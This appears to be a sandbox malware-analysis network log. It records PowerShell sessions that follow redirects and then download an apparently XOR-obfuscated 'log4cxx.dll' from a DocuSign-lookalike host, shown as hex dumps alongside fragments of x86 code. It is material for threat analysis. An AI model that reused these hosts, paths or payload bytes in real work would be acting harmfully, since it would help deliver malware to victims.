2024-12-17 07:10:23 UTC	1369	IN	Data Raw: 00 8b 46 74 59 8b 4e 78 83 24 88 00 83 7e 78 03 76 0f 8b 4e 78 8b 46 74 8b 44 88 fc 83 38 00 74 cf 5f 5e 5d c2 04 00 83 8e 98 00 00 00 ff 83 8e 94 00 00 00 ff e9 6a ff ff ff 55 8b ec 51 8b 0d 28 78 4c 00 56 57 39 0d 30 78 4c 00 75 6e 81 3d 34 78 4c 00 ff ff 00 00 0f 84 8e 00 00 00 68 a0 00 00 00 e8 cf e6 01 00 59 85 c0 0f 84 80 00 00 00 8b c8 e8 fc eb ff ff 8b f8 8d 45 fc 89 7d fc 50 b9 20 78 4c 00 e8 be ea ff ff 8b 35 34 78 4c 00 46 89 35 34 78 4c 00 8b 0d 24 78 4c 00 8b c6 ff 05 30 78 4c 00 8b 0c b1 89 39 8b 4d 08 8b 49 04 89 4f 04 5f 5e 8b e5 5d c2 04 00 6a 03 5e 33 ff 3b ce 7e 0d 8b 15 24 78 4c 00 8b 04 b2 39 38 75 23 68 a0 00 00 00 e8 5b e6 01 00 59 85 c0 74 b7 8b c8 e8 8c eb ff ff 8b f8 eb ac 83 c8 ff eb c3 33 ff eb 85 46 3b f1 7c d1 eb d6 55 8b ec Data Ascii: FtYNx$~xvNxFtD8t_^]jUQ(xLVW90xLun=4xLhYE}P xL54xLF54xL$xL0xL9MIO_^]j^3;~$xL98u#h[Yt3F;\|U
2024-12-17 07:10:23 UTC	1369	IN	Data Raw: e9 c1 fd ff ff 0b d8 e9 22 fe ff ff 0b d8 e9 27 fe ff ff 89 4d 14 e9 50 fe ff ff 89 4d 18 e9 52 fe ff ff 55 8b ec 83 7d 0c 00 57 bf b0 77 4c 00 0f 85 cf 96 03 00 8b 0d 1c 78 4c 00 83 f9 ff 74 7b a1 10 78 4c 00 33 d2 56 8b 04 88 8b 30 8b 0e 89 4d 0c 38 56 3a 74 0f 88 56 3a 39 96 8c 01 00 00 0f 8d b5 96 03 00 8b 7d 08 83 ff 08 0f 8f eb 96 03 00 74 1a 85 ff 74 64 83 ff 01 74 11 83 ff 02 74 51 83 ff 03 74 43 7e 29 83 ff 05 7f 31 80 7e 38 00 75 56 57 51 ff 15 1c 07 49 00 83 ff 08 74 0d 83 ff 04 74 08 ff 75 0c e8 23 30 01 00 c6 46 38 01 33 c0 40 5e 5f 5d c2 08 00 33 c0 eb f7 83 ff 06 0f 84 7d 96 03 00 eb e8 c6 46 38 01 e9 df 96 03 00 c6 46 38 01 e9 69 96 03 00 52 51 ff 15 1c 07 49 00 c6 46 38 00 eb c8 33 c0 eb c7 55 8b ec 83 7d 10 00 0f 85 d6 96 03 00 8b 0d 1c Data Ascii: "'MPMRU}WwLxLt{xL3V0M8V:tV:9}ttdttQtC~)1~8uVWQIttu#0F83@^_]3}F8F8iRQIF83U}
2024-12-17 07:10:23 UTC	1369	IN	Data Raw: 46 6c eb dd 55 8b ec 51 51 8d 45 fc b9 b0 77 4c 00 50 8d 45 f8 50 ff 75 08 e8 53 f4 ff ff 84 c0 74 4b 8b 4d fc a1 24 78 4c 00 57 8b 04 88 8b 38 80 bf 90 00 00 00 1b 75 38 53 8b 5d 0c 8d 43 ff 83 f8 17 77 30 0f b6 80 f9 33 40 00 ff 24 85 dd 33 40 00 6a 01 ff 75 14 ff 75 10 53 57 e8 d8 ec ff ff 33 c0 40 5b 5f 8b e5 5d c2 20 00 33 c0 eb f6 33 c0 eb f1 33 c0 eb ec 8d 49 00 d6 33 40 00 b4 33 40 00 a3 d1 43 00 ec d1 43 00 08 d2 43 00 85 d1 43 00 d6 33 40 00 00 01 01 02 02 01 01 01 06 03 06 03 06 04 06 01 06 01 06 01 06 05 06 01 55 8b ec 83 ec 40 a1 78 72 4c 00 56 33 f6 a3 04 78 4c 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 30 07 49 00 89 45 e4 8b 45 10 89 45 f0 8b 45 0c 89 45 dc 8d 45 c4 50 89 75 e8 Data Ascii: FlUQQEwLPEPuStKM$xLW8u8S]Cw03@$3@juuSW3@[_] 333I3@3@CCCC3@U@xrLV3xLjE0E+uEEu0IEEEEEEPu
2024-12-17 07:10:23 UTC	1369	IN	Data Raw: 46 04 89 47 30 89 7e 04 5f ff 06 5e 5d c2 04 00 33 ff eb eb 8b 0d 84 82 4c 00 85 c9 75 21 ff 35 78 82 4c 00 b9 78 82 4c 00 e8 49 02 00 00 ff 35 70 82 4c 00 b9 70 82 4c 00 e8 39 02 00 00 c3 56 e9 44 9a 03 00 55 8b ec 83 ec 0c 8b 45 08 83 65 f4 00 89 45 f8 85 c0 78 1f 8d 45 f4 b9 80 82 4c 00 50 e8 bc 01 00 00 ff 75 f4 8d 4d f4 e8 05 02 00 00 8b e5 5d c2 04 00 83 65 f8 00 eb db 55 8b ec 8b 45 10 33 c9 2b c1 74 27 48 0f 85 0d 9a 03 00 ff 75 0c ff 75 08 39 0d 80 82 4c 00 75 2b b9 70 82 4c 00 e8 df 05 00 00 8b c8 8b c1 5d c2 0c 00 39 0d 80 82 4c 00 0f 85 fb 99 03 00 b9 70 82 4c 00 ff 75 0c ff 75 08 eb da b9 80 82 4c 00 e8 7c 33 05 00 8b c8 eb cc 33 c0 a3 70 82 4c 00 a3 74 82 4c 00 a3 78 82 4c 00 a3 7c 82 4c 00 a3 80 82 4c 00 a3 84 82 4c 00 66 a3 88 82 4c 00 b8 Data Ascii: FG0~_^]3Lu!5xLxLI5pLpL9VDUEeExELPuM]eUE3+t'Huu9Lu+pL]9LpLuuL\|33pLtLxL\|LLLfL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49734	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:23 UTC	70	OUT	GET /a/index.js HTTP/1.1 Host: google.com Connection: Keep-Alive
2024-12-17 07:10:24 UTC	514	IN	HTTP/1.1 301 Moved Permanently Cross-Origin-Resource-Policy: cross-origin Location: /a/cpanel/index.js Content-Type: text/html; charset=UTF-8 Content-Length: 227 Date: Tue, 17 Dec 2024 07:10:24 GMT Expires: Tue, 17 Dec 2024 07:10:24 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:24 UTC	227	IN	Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Permanently</H1>The document has moved <A HREF="/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49745	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:26 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:10:27 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GOLHhLsGIjDL2KuyuNUYTTIEgh6bMHZJeyNssyuqlBmCIJbKYgD6GXZ5_pFcGlfW4pskqG1tl8EyBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:10:27 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:27 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49751	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:29 UTC	222	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GOLHhLsGIjDL2KuyuNUYTTIEgh6bMHZJeyNssyuqlBmCIJbKYgD6GXZ5_pFcGlfW4pskqG1tl8EyBj5qY25kcloBQw HTTP/1.1 Host: www.google.com Connection: Keep-Alive
2024-12-17 07:10:30 UTC	614	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd3fcac4c7e84428b:TM%3D1734419426:C%3D%3E:IP%3D8.46.123.189-:S%3D-izfmu5bvLgWnRQj5Trf2A%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:10:26+GMT Date: Tue, 17 Dec 2024 07:10:29 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 441 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:30 UTC	441	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 3f 67 6f 6f 67 6c 65 5f 61 62 75 73 65 3d 47 4f 4f 47 4c 45 5f 41 42 55 53 45 5f 45 58 45 4d 50 54 49 4f 4e 25 33 44 49 44 25 33 44 64 33 66 63 61 63 34 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd3fcac4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49765	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:32 UTC	261	OUT	GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd3fcac4c7e84428b:TM%3D1734419426:C%3D%3E:IP%3D8.46.123.189-:S%3D-izfmu5bvLgWnRQj5Trf2A%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:10:26+GMT HTTP/1.1 Host: google.com
2024-12-17 07:10:33 UTC	588	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js Date: Tue, 17 Dec 2024 07:10:32 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 233 X-XSS-Protection: 0 Set-Cookie: GOOGLE_ABUSE_EXEMPTION=ID=d3fcac4c7e84428b:TM=1734419426:C=>:IP=8.46.123.189-:S=-izfmu5bvLgWnRQj5Trf2A; path=/; domain=google.com; expires=Tue, 17-Dec-2024 10:10:26 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:33 UTC	233	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49776	104.21.87.65	443	7844	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:34 UTC	165	OUT	GET /api/uz/0912545164/log4cxx.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: docu-signer.com
2024-12-17 07:10:35 UTC	874	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:10:34 GMT Content-Type: application/octet-stream Content-Length: 2011444 Connection: close Last-Modified: Sun, 15 Dec 2024 11:15:42 GMT ETag: "675eba5e-1eb134" Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8D8tKHrDkG1oCWTZZ0ayYUUWBldxsgVjxb5erNehfUR0qgpvgo%2FpLOOb0xY2FP2Xbc8Wf1wmMh0cmArBvG5XCNJYlVvyDK7AoDWeNPaBmrxadLain3jHovMQlYG3T4yrNMk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f35181b3989435b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7032&min_rtt=1611&rtt_var=3975&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=803&delivery_rate=1812538&cwnd=214&unsent_bytes=0&cid=8b3237fbb74b2494&ts=677&x=0"
2024-12-17 07:10:35 UTC	1369	IN	Data Raw: 7c 05 55 ef ec ec ec 95 83 8a bf 8a 81 9f 83 a1 ae a0 85 a4 8f 98 80 86 a9 8d 9f 99 9e a5 b5 bb 81 a9 87 9e 98 a5 a1 96 84 b4 a1 b8 a6 ae a1 8a b4 a7 ba af 96 81 bf 9d a8 85 be a2 95 9c 85 99 b8 aa 8f ab bd b6 82 b6 aa 89 99 a3 af 80 98 bc a4 a1 bf 98 82 ba 9e 80 a4 a1 87 88 8d bb 9c 86 ba be 9c 8f a2 aa 9d b5 af 82 99 87 b8 bc a2 8b 89 94 85 82 8b aa 95 9a 81 87 ad 89 bf 95 a3 b9 88 9f 9d bb aa b6 9d bb 9b 8a bd bf b4 81 a5 99 bd ba ba 86 a5 a4 a3 bb 9e b8 9e b9 81 95 82 8a 85 a5 95 9e ab bd 9a b9 83 86 85 a7 94 84 8a b6 9b a8 86 bd 9e 96 ae 83 96 b5 ab bf a0 84 aa 94 8b a4 8f 8b b9 bf 9b 9b a7 bf 9b b4 9d bc 82 82 ab 81 8e a6 9f a2 aa af b8 aa b8 af 80 83 bf ad ba a8 83 b8 9e 88 b9 aa b9 96 8e 89 b9 89 a8 a8 86 8b 98 b5 bc 87 a6 9c 80 bc b4 bf bb 9a 81 Data Ascii: \|U
2024-12-17 07:10:35 UTC	1369	IN	Data Raw: b8 8d 8f b5 86 a7 b9 9e 8d 9d ba a4 94 a3 85 b9 b5 9a be b6 9c 9c bd ab 8d 9a a6 80 a9 85 83 80 ab a5 9f a8 9c 87 8a b5 99 96 b6 82 98 9c b8 88 9d 99 b4 ae bf 87 b9 be 82 a6 a5 a6 9e a3 ae 85 b9 b5 81 9e a3 bd ab ba bf b4 bb ad 96 ae a8 9b 80 b8 9f 8e a6 af 86 89 9d a9 a4 a3 8d 9e 9b bb be 88 86 84 a0 95 8e 9f 9c a4 94 95 b9 87 a1 be a1 a8 9b ab 86 a5 96 a1 a2 99 b5 ad a7 a3 96 83 bb a1 b9 bd 9d ae bf 83 ad a7 b6 a5 87 b9 9d 98 82 bd a6 9a bf 9f a9 ba 8d ae a5 95 8a b9 aa 85 b6 9e 83 83 be a6 af 9b 8d 98 a6 86 a5 84 a7 9b ae a9 b8 ae 80 a3 84 94 83 aa 96 a0 96 9a 84 be 84 b5 94 99 ab 8f ae 9d 81 8f 99 aa 89 9e a2 a4 a9 96 b5 84 b4 96 bd 8e a6 9c b8 bf a6 b8 b4 bd be 82 a6 88 8b 8b 80 87 9b 82 a4 8d be a1 bc b9 a3 bd 84 9a a1 9b 81 8d 89 95 b5 b6 8b bd 9d Data Ascii:
2024-12-17 07:10:35 UTC	1369	IN	Data Raw: b4 aa a1 85 9d 94 89 ab 86 9e a4 be 83 89 88 96 8d b5 9d 80 bc 9a 8b 8a b5 a6 82 9c 89 a6 8e ad 96 b4 95 84 99 8a b4 a2 a6 9f 95 94 9b 88 a5 9b bd 98 9f ad ab 86 86 a7 be 9d 96 bf 88 96 a2 8f 9b 9c 87 9a 95 a5 8f 9d 8b 87 b6 81 a3 9b a5 ab 8e ba 8d be a9 bc 8a ab ad 83 a2 b5 a9 a4 bf 9e a6 ad 83 85 95 89 b4 a1 ae 9f 9a af b6 89 a0 ab 8a 94 a5 a8 aa 8a b9 9e 9f a3 88 b5 88 a2 84 a1 bd 8e a5 96 a1 a8 ab 88 8b 83 8e 7c 05 55 ef ec ec ec 86 b9 a9 bf ba ad ad 82 af 98 a5 a0 b4 a1 b5 87 98 b8 bd bc 9d bf 8f 81 bf 8a 9c 85 ba 94 9b 95 b6 85 ab ba 8e 9d 8b a2 a9 83 af 8a a5 80 a6 9f 9b 8b bd a5 80 9d 8b a4 b5 bd bc 99 ae 88 a5 b8 84 99 bf b6 8b bd 9e 8e ab a3 a4 81 bf bc 83 a1 9d 94 88 84 bd bd 8f 82 82 aa 87 87 aa 94 ae 9b ab bb b9 a6 bf a2 bc be 9f a3 81 88 89 Data Ascii: \|U
2024-12-17 07:10:35 UTC	1369	IN	Data Raw: bf ba 9c bf 84 bb 8b a5 a3 ad a5 a5 88 af b8 8f 8b b4 b5 9d 99 86 98 85 a5 bd af a7 ad ae b5 81 9a bd 9e aa a3 af 87 a1 95 87 a8 a5 bc 86 9e a8 b6 a5 ba 80 a9 bc aa 8a 82 95 87 8e b5 a9 88 8d a0 b9 a0 a1 b9 ae a1 bf 87 8f 89 89 bf ae a6 af 88 b9 a4 8a 94 b8 9e a9 a8 a7 94 b6 ba 8a af 86 89 a0 be bc a7 8b 85 89 ab 80 ad 8f 82 af 80 83 80 a3 87 8d a4 ad ae ae af 8e b5 ba 96 a1 8e a4 99 ad b8 be a3 be a8 a6 9a b6 94 a5 a3 8f 98 a3 bd 8f af 95 89 86 bf 8f 8b b5 b8 8a a4 b4 82 8d 8d b5 b6 9f ba a8 a5 8a 83 a5 b4 bb 8d a7 a6 a1 a0 b4 94 9a b4 a5 a9 94 80 84 aa bf 8f 8f 8a a9 be 94 85 82 85 96 bc 8e ba a5 9b bf 80 bb b8 a8 9e 98 a5 83 a7 88 a5 82 be 82 88 9f 84 85 ab 9f 82 be 9e b4 bf 84 b6 9c 8e 96 a0 99 ae 88 bc 98 aa a2 a2 ba 8e be a4 86 b4 89 ad bc 85 81 b5 Data Ascii:
2024-12-17 07:10:35 UTC	1369	IN	Data Raw: ba 8a aa bc b6 8e ab bd bb b8 9b ab b5 ad 84 96 a4 87 85 98 83 9f a7 8b 86 94 99 b5 b8 a1 94 a5 a7 8e b6 b4 af bd 84 a6 94 9b 80 82 af b5 bf 9e 96 82 82 95 8a 84 a7 94 9a ad b9 a2 a0 98 88 ab a2 ab a4 81 85 87 8b 96 82 b4 87 bb ae 9d aa ba ba b9 8d 98 b8 88 ba 9a b9 ad 94 a6 a3 83 a9 98 85 bd 8f 81 a7 b8 b5 a3 89 99 85 ba 89 a3 9e 99 a5 8d b4 b8 9a a2 81 ab a7 87 a6 bb b6 9e 84 bb a2 8d 87 94 95 bd 94 a3 bf a3 b4 bf 9d 9f bf 89 8b 8f 8b a5 8e 8f be 98 8b 9d 86 89 86 84 a5 9a 8e 84 a7 81 82 83 a6 9d a7 8b ad a3 9d a3 a2 9b 9b b4 85 9d 95 88 87 aa ab a5 a7 85 85 89 b4 88 80 a0 a1 b9 9c a1 88 b9 bb 9b be 8b 8b a8 96 8e 98 87 9c 83 bb 80 87 bf b9 b6 8e ae a6 9d aa 9d 80 a6 88 af 82 8e 98 a4 8a a2 8f a0 a6 b6 9e aa ad bc 9c bb 89 85 b5 9e bc 8a 8f bb 94 a1 88 Data Ascii:
2024-12-17 07:10:35 UTC	1369	IN	Data Raw: ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec bc a9 ec ec a0 ed e4 ec f5 b2 ae c6 ec ec ec ec ec ec ec ec 0c ec 62 6d e7 ed ee f5 ec 26 ed ec ec bc ec ec ec ec ec ec 9c 3a ed ec ec fc ec ec ec 0c ed ec ec ec ac ec ec fc ec ec ec fc ec ec e8 ec ec ec ec ec ec ec e8 ec ec ec ec ec ec ec ec 6c ee ec ec e8 ec ec ec ec ec ec ee ec ec ec ec ec fc ec ec ac ec ec ec ec fc ec ec fc ec ec ec ec ec ec fc ec ec ec ec ec ec ec ec ec ec ec ec ec ee Data Ascii: bm&:l
2024-12-17 07:10:35 UTC	1369	IN	Data Raw: ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec Data Ascii:
2024-12-17 07:10:35 UTC	1369	IN	Data Raw: ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec Data Ascii:
2024-12-17 07:10:35 UTC	1369	IN	Data Raw: ec 78 fc ac ec e3 e6 a5 a5 82 98 89 9e 8a 8d 8f 89 ec ec ec ec ed ec ec ec ec ec ec ec ec 2c ec ec ec ec ec ec aa ea bf 95 9f 98 89 81 ef ec 13 13 20 6f a8 c8 e8 14 05 d1 a4 ec ec 6f a8 c8 e8 14 05 b7 a4 ec ec 6f a8 c8 e8 14 05 89 a4 ec ec 20 20 2d fc ac ec 27 fc ac ec 39 fc ac ec ed ec ec ec ec ec ec ec ec ec ec ec 2c ec ec ec ec ec ec aa 0d fc ac ec e4 ec ec ec ec ec ec ec 61 ac ec b0 fd ac ec 01 fc ac ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec b0 fd ac ec e0 ec ec ec f0 fc ac ec b8 da ac ec 30 b4 ac ec 04 b4 ac ec 84 da ac ec b0 da ac ec 14 b4 ac ec 1c df ac ec c0 d8 ac ec fd b8 a5 82 98 89 9e 8a 8d 8f 89 88 a3 8e 86 89 8f 98 67 2c 13 c9 28 ed ae ec 67 2c 13 c9 2c ed ae ec 67 2c 13 c9 50 ed ae ec 67 2c 13 c9 54 ed ae ec Data Ascii: x, ooo -'9,a0g,(g,,g,Pg,T
